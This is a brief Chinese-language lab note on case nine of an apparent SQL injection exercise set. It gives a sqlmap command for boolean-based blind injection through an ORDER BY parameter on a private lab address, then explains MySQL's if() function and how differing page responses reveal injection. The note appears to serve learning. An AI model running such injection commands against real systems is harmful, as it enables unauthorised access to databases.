案例九-order-by：

sqlmap -u "http://192.168.2.131/sqli/example9.php?order=name" --dbms mysql -technique B --level 5

分析

虽然工具注入成功了，但还是分析一下。否则以后再遇到，只是碰运气，万一注入失败了，也不知道是哪里出错了。

mysql的if语句。

if(a,b,c)
如果a表达式为true，则运行表达式b；a = false，则运行表达式c。

两种注入语句，返回页面不同，说明有注入。